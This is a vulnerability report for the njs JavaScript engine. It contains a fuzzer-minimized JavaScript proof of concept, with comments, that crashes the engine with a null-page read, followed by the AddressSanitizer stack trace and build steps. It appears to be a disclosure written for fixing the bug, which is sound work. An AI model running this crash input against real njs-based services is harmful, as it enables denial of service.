Commit : c62a9fb92b102c90a66aa724cb9054183a33a68c
Version : 0.7.5
Build :
./configure --cc=clang --address-sanitizer=YES
make
Proof of concept
// Minimizing 6DF62492-854B-4782-8E5F-C219F56258E2
// Empty no-op left by the minimizer; nothing in this listing calls it.
function placeholder() {
  return undefined;
}
/**
 * Fuzzer-minimized reproducer (the "Minimizing <id>" header above is the
 * minimizer's case id). Nothing below is application logic: the statement
 * order, the literal values and the dead locals are part of what drives the
 * engine into the fault, so the body is kept byte-for-byte.
 *
 * Per the AddressSanitizer report below this listing, the fault is a READ of
 * the near-NULL address 0x56 in njs_function_previous_frame while a return
 * opcode executes inside a lambda call (njs_vmcode_return <- njs_vmcode_interpreter
 * <- njs_function_lambda_call). The report shows a read, not a write, so as
 * far as this page shows it is a crash / denial-of-service class bug.
 * Which statement's return reaches the bad frame pointer is not visible from
 * the listing alone — NOTE(review): confirm by bisecting.
 *
 * Most of the `var vNN = ...` locals are template literals that are assigned
 * and never read again (no interpolation, never handed to Function/eval), so
 * they are inert strings here.
 */
function main() {
// Async arrow; invoked exactly once at the end of main() (v305 = v0()).
var v0 = async (v1,v2,...v3) => {
var v10 = `
var v11 = Object(-9007199254740993,-4027512271n);
`;
var v16 = `
var v17 = (-256n)(-9007199254740993,-4027512271n);
`;
var v27 = `
Object[-4027512271] **= -4027512271n;
var v29 = Object(-9007199254740993,...-65536n);
`;
var v33 = `
var v34 = Object(-9007199254740993,-4027512271n);
`;
var v37 = `
var v38 = Object(-9007199254740993,-9007199254740993n);
`;
var v42 = `
var v43 = undefined(-1290018985n,-4027512271n);
`;
var v49 = [-1000000.0,-1000000.0,-1000000.0];
var v57 = `
var v58 = (-1.7976931348623157e+308)(8980,-4027512271n);
`;
var v59 = `
(-4027512271n)[-4027512271] **= -4027512271n;
var v60 = Object(0n,-4027512271n);
`;
// Never called in this listing.
function v66(v67) {
v67[1866532165] = Map;
}
// Promise executor (see `new Promise(v68)` near the end of v0); the Promise
// constructor runs it synchronously, so everything in here executes before
// v240 is assigned.
function v68(v69,v70) {
var v77 = new Uint8ClampedArray();
var v80 = {};
var v81 = /gL8?/;
var v82 = {};
var v83 = [v80,v82,v81];
// Ignores its parameter; writes Map onto the enclosing array v83.
function v85(v86) {
v83[1866532165] = Map;
}
// Installed as the 'set' accessor in v102 below; not invoked directly here.
async function v89(v90,v91) {
var v92 = await Map;
}
// Empty executor: v97 never settles.
function v93(v94,v95) {
}
var v97 = new Promise(v93);
var v99 = v97["catch"]();
// Accessor descriptor whose getter is the Promise constructor itself. Reading
// v103.constructor therefore calls Promise as a plain function (no `new`),
// which per spec is a TypeError — NOTE(review): likely trigger candidate, confirm
// against the engine's own behaviour.
var v102 = {"get":Promise,"set":v89};
var v103 = Object.defineProperty(v99,"constructor",v102);
// `await v103` resolves a native promise and so reads its `constructor`
// property, hitting the getter installed above.
async function v104(v105,v106) {
var v107 = await v103;
}
var v108 = v104();
var v109 = v85(Map);
var v110 = String();
var v121 = `
var v122 = Object(-9007199254740993,-4027512271n);
`;
var v123 = `
(-4027512271n)[-4027512271] **= -4027512271n;
`;
var v129 = `
var v131 = [-4027512271n,Object,-4027512271n,1,v77,-4027512271n,Object,Uint8ClampedArray,8980,Object];
var v132 = Object();
v132[-4027512271] **= -4027512271n;
`;
var v139 = `
var v140 = Object(-9007199254740993,-4027512271n,0,-4027512271n);
`;
var v147 = `
var v148 = Object(-9007199254740993,-4027512271n,15034n);
`;
var v151 = `
var v152 = Object(-4294967296,-4027512271n);
`;
var v160 = `
var v161 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v171 = `
Object[-4027512271] **= -4027512271n;
var v173 = Object(-9007199254740993,-4027512271n);
`;
var v175 = `
var v176 = Object(-9007199254740993,-9007199254740993n);
`;
var v180 = `
var v181 = undefined(-4027512271n,-4027512271n);
`;
var v186 = `
var v187 = "bigint"();
v187[-4027512271] **= -4027512271n;
var v188 = Object(-4027512271n,-4027512271n);
`;
var v189 = `
(-4027512271n)[-4027512271] **= -4027512271n;
var v190 = Object(-9007199254740993,-4027512271n);
`;
var v194 = `
var v195 = ReferenceError(-4027512271n,-4027512271n);
`;
var v198 = Float64Array();
var v203 = `
v198[-4027512271] **= -4027512271n;
var v204 = Object(-9007199254740993,-4027512271n);
`;
var v205 = `
var v206 = Object(-4027512271n,-4027512271n);
`;
var v210 = `
var v211 = (-1070059123)(-9007199254740993,-4027512271n);
`;
var v212 = `
var v213 = ArrayBuffer(-4027512271n,-9007199254740993n);
`;
var v219 = `
var v220 = undefined(-4027512271n,-4027512271n,Uint8ClampedArray,8980,-4027512271n);
`;
var v225 = `
var v226 = (-4027512271n)();
var v227 = v226(0n,-4027512271n);
`;
var v231 = `
var v233 = Object();
v233[-1316174388] >>= -4027512271n;
var v235 = Object["getPrototypeOf"](v110,-4027512271n);
var v236 = Object(-4027512271n,-4027512271n);
`;
var v237 = `
(-4027512271n)[-4027512271] **= -4027512271n;
var v238 = Symbol(-9007199254740993,-4027512271n);
`;
// Sets a property on the Promise constructor itself (the numeric key is
// stringified to "-4294967297").
Promise[-4294967297] = Map;
}
// Runs v68 synchronously as the executor (see above).
var v240 = new Promise(v68);
var v248 = Object();
var v249 = `
var v250 = Object(-9007199254740993,-4027512271n);
`;
var v251 = `
var v252 = v251();
v252[-4027512271] **= -4027512271n;
var v253 = Object(v248,-4027512271n);
`;
var v254 = `
Object[-4027512271] **= -4027512271n;
var v256 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v260 = `
var v261 = (-4027512271n)(-9007199254740993,-2147483649n);
`;
var v264 = `
var v265 = (-4027512271n)(v49,-4027512271n);
`;
var v271 = `
var v272 = Error(-9007199254740993,3272380054n,Uint8ClampedArray,8980,0n);
`;
var v276 = `
var v277 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v278 = `
var v280 = Object();
v280[-4027512271] **= -767560483n;
var v281 = Object(-4027512271n,-3242169687n);
`;
var v282 = `
(-4027512271n)[-4027512271] **= -4027512271n;
var v283 = Object(-9007199254740993,-4027512271n);
`;
var v287 = `
var v288 = (-9007199254740993)();
v288[-4027512271] **= -4027512271n;
var v289 = v288(0n,-4027512271n);
`;
var v294 = `
undefined[-4027512271] **= -4027512271n;
var v295 = Object(...-2691822435,2828643507n);
`;
// Array.prototype.toString ignores its argument and joins the elements, so
// v303 is a comma-separated list of numeric literals. Function(v303) compiles
// that string as a function body (string-to-code, fine in a reproducer but
// never acceptable on untrusted input); v304 is built and never called.
var v299 = [-422610.85859980097,13558,-422610.85859980097,-422610.85859980097];
var v301 = Object();
var v303 = v299["toString"](v301);
var v304 = Function(v303);
};
// Single invocation of the async arrow; its returned promise is neither
// awaited nor given a rejection handler.
var v305 = v0();
}
// Entry point of the reproducer; the AddressSanitizer report that follows is
// what the reporter observed when running this file under the build above.
main();
// CRASH INFO
// ==========
// TERMSIG: 11
// STDERR:
Stack dump
AddressSanitizer:DEADLYSIGNAL
=================================================================
==9592==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000056 (pc 0x0000005094d3 bp 0x7fffa7f408f0 sp 0x7fffa7f40140 T0)
==9592==The signal is caused by a READ memory access.
==9592==Hint: address points to the zero page.
#0 0x5094d3 in njs_function_previous_frame /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:167:5
#1 0x5094d3 in njs_vmcode_return /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:1843:16
#2 0x5094d3 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:737:24
#3 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
#4 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
#5 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
#6 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
#7 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
#8 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
#9 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
#10 0x7fa3e91a8082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
#11 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:167:5 in njs_function_previous_frame
==9592==ABORTING
Environment
Proof of concept
Stack dump
Credit
dramthy(@topsec alpha)